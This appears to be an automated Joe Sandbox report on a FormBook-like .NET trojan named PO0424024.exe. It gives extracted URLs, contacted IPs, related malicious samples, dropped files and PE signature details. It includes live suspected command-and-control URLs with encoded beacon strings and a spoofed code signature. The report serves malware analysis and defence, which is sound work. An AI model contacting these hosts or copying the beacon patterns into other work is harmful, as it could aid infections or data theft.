http://www.threesomeapps.com/pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=mRVcZEOhq89+MGHBKj9OIc/04Av6T2wEhyk9HpRK9pO5sVzjQ2X+QIoGEwrX8lym3PQN8R/kDgsMd57+ef1OrGKEsTU4CFRzLSC8xo47mPR0FpBjSaDhnxk=	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mail.365.com/login.html	tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000006614000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2456443722.000000000EFB4000.00000004.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.marksmile.com/	tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000006614000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2456443722.000000000EFB4000.00000004.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/DataSet1.xsd	PO0424024.exe	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.fasthosts.co.uk/domain-names/search/?domain=$	tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000007436000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004F46000.00000004.10000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.tiro.com	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fasthosts.co.uk/	takeown.exe, 00000007.00000002.4171352067.0000000004F46000.00000004.10000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_	tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000007436000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004F46000.00000004.10000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.marksmile.com/asset/lp_qrcode.png	tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000006614000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2456443722.000000000EFB4000.00000004.80000000.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.namecheap.com/domains/registration/results/?domain=luckydomainz.shop	tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.00000000067A6000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.00000000042B6000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.fonts.com	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.sakkal.com	PO0424024.exe, 00000000.00000002.1733538993.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.threesomeapps.com	tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4176035041.00000000086E0000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	PO0424024.exe	false	URL Reputation: safe	unknown
https://www.fastmail.help/hc/en-us/articles/1500000280141	tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.00000000072A4000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004DB4000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.sedo.com/services/parking.php3	takeown.exe, 00000007.00000002.4171352067.00000000042B6000.00000004.10000000.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.marksmile.com/asset/lp_style.css	tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000006614000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2456443722.000000000EFB4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.fastmailusercontent.com/filestorage/css/main.css	tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.00000000072A4000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004DB4000.00000004.10000000.00040000.00000000.sdmp	false		high
https://img.sedoparking.com/templates/images/hero_nc.svg	tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.00000000067A6000.00000004.80000000.00040000.00000000.sdmp, tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000007112000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4172750176.0000000006530000.00000004.00000800.00020000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004C22000.00000004.10000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.00000000042B6000.00000004.10000000.00040000.00000000.sdmp	false		high
https://static.fasthosts.co.uk/icons/favicon.ico	tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000007436000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004F46000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.namecheap.com/domains/registration/results/?domain=kakaobrain.us	tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000007112000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4172750176.0000000006530000.00000004.00000800.00020000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004C22000.00000004.10000000.00040000.00000000.sdmp	false		high
https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par	tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000007436000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004F46000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.168.172.37	www.celebration24.co.uk	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	false
162.43.104.164	www.shun-yamagata.com	United States	11333	CYBERTRAILSUS	false
84.32.84.32	carsinmultan.com	Lithuania	33922	NTT-LT-ASLT	false
74.208.236.153	www.klconstructions.net	United States	8560	ONEANDONE-ASBrauerstrasse48DE	false
91.195.240.123	www.cd14j.us	Germany	47846	SEDO-ASDE	false
47.76.62.167	www.xn--yzyp76d.com	United States	9500	VODAFONE-TRANSIT-ASVodafoneNZLtdNZ	false
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
203.161.46.103	www.happymarts.top	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	false
3.33.130.190	threesomeapps.com	United States	8987	AMAZONEXPANSIONGB	false
195.242.88.141	unchainedventure.com	Romania	34301	KFNETRO	false
213.171.195.105	www.holein1sa.com	United Kingdom	8560	ONEANDONE-ASBrauerstrasse48DE	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430828
Start date and time:	2024-04-24 09:19:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO0424024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@15/11
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 219 Number of non-executed functions: 254
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.

Simulations

Behavior and APIs

Time	Type	Description
09:20:00	API Interceptor	1x Sleep call for process: PO0424024.exe modified
09:21:23	API Interceptor	9716811x Sleep call for process: takeown.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.168.172.37	https://rsa.pub:443	Get hash	malicious	Unknown	Browse
84.32.84.32	VAT PO 24000042.exe	Get hash	malicious	FormBook	Browse	www.cordonnerie-7lieues.com/gtit/
	SecuriteInfo.com.Trojan.Packed2.46654.20750.14267.exe	Get hash	malicious	FormBook	Browse	www.cordonnerie-7lieues.com/gtit/
	Swift Message.pdf.exe	Get hash	malicious	FormBook	Browse	www.gamesun.website/cga5/
	NEW ORDER.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	www.thecommunitycatalyst.com/ij84/?0p7=W6O83hZ8u&P6A=1X9vP8E8Ekk9mAg0FaLEi2YPUHH8FmxMVXf3WfBlM0Ba4cTgag1gqfGZIY2i8M3UfgO5
	MT103 Remittance.vbs	Get hash	malicious	FormBook	Browse	www.cryptoshipping-cargo.site/m07a/
	Xbkrgp2HX73cvU3.exe	Get hash	malicious	FormBook	Browse	www.elenagilherrero.com/rrei/
	j6kpIFikdc.exe	Get hash	malicious	FormBook	Browse	www.elenagilherrero.com/rrei/
	r6WrUcBg7ToYT8S.exe	Get hash	malicious	FormBook	Browse	www.elenagilherrero.com/rrei/?zP=INTTOvU9IKzsDC8jnC91t9KE6zPKFjffbQ3PB1rVUdq65O2damOTnNpGVXayVX3m+HMb4d/p1fbR6UWHB05bp5QsPP04RueT1AJ5un/OSWdMiixP1A==&7Lyt=yVwl4fSP
	our order 6076297.exe	Get hash	malicious	FormBook	Browse	www.cityrentsatruck.com/e25x/
	file.exe	Get hash	malicious	FormBook	Browse	www.elenagilherrero.com/rrei/
74.208.236.153	po-1.exe	Get hash	malicious	FormBook	Browse	www.we2savvyok.com/k8b5/?hP=T674KF8pIBfL&l6A=WMxZ07hVRa8Q0EjLpEKD2Hkh+asw/jD0gTFFtKOtuZ45dGRSbVe+sSxPpAzbGnQKt5Y7
91.195.240.123	PO0423024.exe	Get hash	malicious	FormBook	Browse	www.cd14j.us/pq0o/?atJ=zdIBKqN9oP3plxVQyNgvYq0mMKrvq5q/57+iRklTGjPKULzejm8MTR3zmbqN1d/mp0y1+1mzyQU/+H24oE5uDnI7sp5jy5UFN+aaU0u6oQX+YH9icEJ0mm4=&_J=5D6x
	PO0423023.exe	Get hash	malicious	FormBook	Browse	www.cd14j.us/pq0o/
	2x6j7GSmbu.exe	Get hash	malicious	FormBook	Browse	www.oq5o6u.us/9upe/
	BL4567GH67_xls.exe	Get hash	malicious	FormBook	Browse	www.qpdkg.lat/n8t5/
	5AmzSYESuY.exe	Get hash	malicious	FormBook	Browse	www.theluckypaddle.net/kh11/?sp=pEnoyLbB8R2ToRdttB3I7kzFJY2mhizc4gkM7DsureRNB8KuNwcW8JBDtq429pXJBUYB&SP=cnxh5xAH
	0wD4IaXvQH.exe	Get hash	malicious	FormBook	Browse	www.wocan92.top/kh11/?ExlpdH=1SyeG5UxQaNYmPlCsF3Jxo2cHASRWxZA4zW8WbIseYgPwE2bO9hSxAVmxZKC97PVduda&anx=TXFXCVdxMl5ty
	8C3H9zQgK2.exe	Get hash	malicious	FormBook	Browse	www.theluckypaddle.net/kh11/?9r=pEnoyLbB8R2ToRdttB3I7kzFJY2mhizc4gkM7DsureRNB8KuNwcW8JBDtpYp2JHxbzlL&yT=H0GxcDi
	Scan Document Copy_docx.exe	Get hash	malicious	FormBook	Browse	www.qpdkg.lat/n8t5/
	SecuriteInfo.com.W32.AutoIt.IJ.gen.Eldorado.2874.1070.exe	Get hash	malicious	FormBook	Browse	www.theluckypaddle.net/kh11/?02M=pEnoyLa18xzj1hAZxx3I7kzFJY2mhizc4gkM7DsureRNB8KuNwcW8JBDtpYMt43xbz5G&EVdL=KndHBxqXqV
	0ekwLomWKo.exe	Get hash	malicious	FormBook	Browse	www.uc9d1.us/g0dh/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.happymarts.top	PO0423024.exe	Get hash	malicious	FormBook	Browse	203.161.46.103
parkingpage.namecheap.com	shipping document.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	Pago pendiente.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	PO0423024.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	PO0423023.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	INQ No.KP-50-000-PS-IN-INQ-0027.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Ordine_doc_419024001904.bat	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	PO_La-Tanerie04180240124.vbs	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	PO_La-Tanerie04180240124.bat	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	Arrival Notice.vbs	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	NEW-ORDER_pdf.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
www.xn--yzyp76d.com	PO0423024.exe	Get hash	malicious	FormBook	Browse	47.76.62.167
www.xn--yzyp76d.com	PO0423023.exe	Get hash	malicious	FormBook	Browse	47.76.62.167
www.cd14j.us	PO0423024.exe	Get hash	malicious	FormBook	Browse	91.195.240.123
www.cd14j.us	PO0423023.exe	Get hash	malicious	FormBook	Browse	91.195.240.123

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NTT-LT-ASLT	APRIL PAYMENT_17-04-24.HTML	Get hash	malicious	HTMLPhisher	Browse	84.32.84.55
	NEW-ORDER_pdf.exe	Get hash	malicious	FormBook	Browse	84.32.84.248
	VAT PO 24000042.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	SecuriteInfo.com.Trojan.Packed2.46654.20750.14267.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	alhadani Aprilorders140424.scr.exe	Get hash	malicious	FormBook	Browse	84.32.84.131
	Swift Message.pdf.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	NEW ORDER.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	84.32.84.32
	MT103 Remittance.vbs	Get hash	malicious	FormBook	Browse	84.32.84.32
	Xbkrgp2HX73cvU3.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	http://sellugsk.live	Get hash	malicious	Unknown	Browse	84.32.84.155
CYBERTRAILSUS	a2Mng2JPCI.elf	Get hash	malicious	Mirai, Okiru	Browse	162.42.104.220
	skid.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	162.42.35.23
	sample letter of intent for renewing contract in teaching 94828.js	Get hash	malicious	Unknown	Browse	162.43.116.116
	SecuriteInfo.com.Win32.RansomX-gen.4067.126.exe	Get hash	malicious	LummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader	Browse	162.43.101.19
	0ec12hfowt.elf	Get hash	malicious	Mirai	Browse	162.42.199.105
	ZRgv8wdMtR.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	162.43.104.145
	https://my-s0ftbank.com/sbid_auth/type1/2.0/authorization	Get hash	malicious	Unknown	Browse	162.43.48.160
	DOC_6653.exe	Get hash	malicious	FormBook	Browse	162.43.117.107
	pedido761396939049.exe	Get hash	malicious	FormBook	Browse	162.43.117.107
	Price_inquiry.exe	Get hash	malicious	FormBook	Browse	162.43.118.58
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	OKhCyJ619J.rtf	Get hash	malicious	Remcos, DBatLoader	Browse	103.186.117.100
	fu56fbrtn8.exe	Get hash	malicious	Remcos, DBatLoader	Browse	103.186.117.142
	HFiHWvPsvA.rtf	Get hash	malicious	Remcos, DBatLoader	Browse	103.186.117.142
	1mHUcsxKG6.elf	Get hash	malicious	Mirai	Browse	103.183.144.35
	payment swift.xls	Get hash	malicious	Remcos, DBatLoader	Browse	103.186.117.142
	W5xi2iuufC.elf	Get hash	malicious	Mirai	Browse	103.169.166.27
	jdsfl.arm.elf	Get hash	malicious	Mirai	Browse	134.115.167.10
	jdsfl.x86.elf	Get hash	malicious	Mirai	Browse	150.203.163.71
	SocUwyIjOh.elf	Get hash	malicious	Mirai	Browse	157.85.230.5
	tajma.arm7-20240421-1854.elf	Get hash	malicious	Mirai, Okiru	Browse	103.174.73.190
ONEANDONE-ASBrauerstrasse48DE	shipping document.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	217.160.0.111
	Zapytanie ofertowe (7427-23 ROCKFIN).exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	213.165.67.118
	INQ No.KP-50-000-PS-IN-INQ-0027.exe	Get hash	malicious	FormBook	Browse	217.76.128.34
	https://lamerelea.com/	Get hash	malicious	Unknown	Browse	217.160.0.59
	Gq7FlDf6cE.elf	Get hash	malicious	Mirai	Browse	217.174.247.147
	Signed Proforma Invoice 3645479_pdf.vbs	Get hash	malicious	FormBook	Browse	217.160.0.95
	https://recouvrement-assurance.fr/LKeZL	Get hash	malicious	Unknown	Browse	82.165.105.163
	https://recouvrement-assurance.fr/LKeZL	Get hash	malicious	Unknown	Browse	82.165.105.163
	Tepanec.vbe	Get hash	malicious	AgentTesla, GuLoader	Browse	213.165.67.118
	1704202412475.EXE.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.160.0.183

Process:	C:\Users\user\Desktop\PO0424024.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\43PI9J

Download File

Process:	C:\Windows\SysWOW64\takeown.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.907846553460419
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	PO0424024.exe
File size:	833'544 bytes
MD5:	192be7ac2833574aafeeea8e0cd52380
SHA1:	264298e6ebda222d48c0185c1ad168c51c0dc133
SHA256:	19640f20d067c8ca1ba3e08d34ea493c05b99016c6608dbcbfdf848ca4d60452
SHA512:	3301b3f0e8f8f71de13cdf22dee89cfa1a74f6df0e1831018a2bf2725977edbccdb8b4baddb0ec8288a7faafb979a8040ce5bdb9ffababb40a039d2b657edd9f
SSDEEP:	24576:1R1WMVUu9FCfSwNZAXJ7oaOJdF+mJ312Zj:H4MVUuviFNZ0E1Jl2t
TLSH:	DD0512D277A85F23C57C4BFB9158C02027F1E06BB453C3DB8ED561DA0DA2BA10616E9B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...mw$...............0..v..........6.... ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4c9536
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xA924776D [Thu Dec 4 04:56:13 2059 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 00:00:00 08/11/2021 23:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
inc esi
dec edi
push edx
xor al, 54h
xor eax, 42384738h
aaa
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], dh
